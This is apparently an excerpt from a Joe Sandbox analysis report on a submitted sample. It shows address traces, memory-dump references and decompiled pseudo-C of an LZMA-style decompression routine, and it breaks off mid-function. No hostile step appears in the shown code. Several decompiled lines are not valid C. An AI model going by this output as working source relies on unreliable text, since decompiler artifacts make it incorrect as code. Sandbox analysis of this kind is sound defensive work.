                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f94
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406f9a
                                                                                              0x00406fa0
                                                                                              0x00406f3e
                                                                                              0x00406f3e
                                                                                              0x00406f41
                                                                                              0x00000000
                                                                                              0x00406f41
                                                                                              0x00406fa2
                                                                                              0x00406fa2
                                                                                              0x00406fa5
                                                                                              0x00406fa8
                                                                                              0x00406fab
                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407056
                                                                                              0x00407056
                                                                                              0x00407059
                                                                                              0x004073cb
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00000000
                                                                                              0x00407482
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004070cf
                                                                                              0x004070cf
                                                                                              0x004070d3
                                                                                              0x00407599
                                                                                              0x00000000
                                                                                              0x00407599
                                                                                              0x004070d9
                                                                                              0x004070dc
                                                                                              0x004070df
                                                                                              0x004070e2
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e4
                                                                                              0x004070e7
                                                                                              0x004070ea
                                                                                              0x004070ed
                                                                                              0x004070f0
                                                                                              0x004070f3
                                                                                              0x004070f6
                                                                                              0x004070f7
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070f9
                                                                                              0x004070fc
                                                                                              0x004070ff
                                                                                              0x00407102
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407105
                                                                                              0x00407108
                                                                                              0x0040710a
                                                                                              0x0040710a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x004075e5
                                                                                              0x004075eb
                                                                                              0x004075ed
                                                                                              0x004075f4
                                                                                              0x004075f6
                                                                                              0x004075fd
                                                                                              0x00407601
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407399

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                              • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                              • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                              • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
